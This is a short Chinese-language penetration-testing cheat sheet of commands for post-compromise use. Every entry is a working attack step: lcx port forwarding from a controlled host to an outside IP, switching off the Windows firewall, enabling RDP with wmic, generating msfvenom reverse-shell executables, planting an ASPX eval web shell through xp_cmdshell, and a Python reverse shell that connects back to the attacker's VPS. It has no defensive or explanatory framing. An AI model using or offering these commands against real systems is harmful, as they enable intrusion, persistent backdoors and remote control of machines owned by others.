渗透常用命令笔记
1.内网渗透端口转发:
在被控制机上执行:
lcx.exe -slave 216.32.*.*(一个外网ip) 51 192.168.2.32(内网ip) 端口号
netsh firewall set opmode disable 开启3389后关闭防火墙
在本机上执行:
lcx.exe listen 51 3389
2.win7开3389
1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired
3.msf生成exe
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe 2 msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.mach
4.xp_cmdshell 写小马
exec xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["z"],"unsafe");%^> > 路径+1.aspx'
5.python 反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("你的VPSIP",端口号));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'